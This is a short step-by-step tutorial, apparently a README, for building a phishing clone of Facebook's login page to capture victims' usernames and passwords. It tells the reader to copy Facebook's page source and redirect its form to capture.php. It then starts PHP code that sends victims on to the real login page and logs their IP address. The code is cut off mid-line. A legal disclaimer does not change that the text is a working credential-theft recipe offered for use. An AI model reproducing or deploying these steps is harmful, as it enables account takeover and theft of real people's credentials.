Capturing username and password using phishing page Legal disclaimer: Usage of phishing for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program STEP 1: Install Xampp and start the Apache Service. STEP 2: Open facebook.com and copy the source (ctrl + U) into a notepad file. Search for "action=" in the code and replace the URL following it with "capture.php" (only first 2 occurances needs to be changed) Save it as index.html STEP 3: Create a new text file and write the following code in it: <?php // Redirect header("Location:https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110"); // Get IP address $ip = isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : isset($_SERVER['HTTP_X_F...
Attack is the best defence.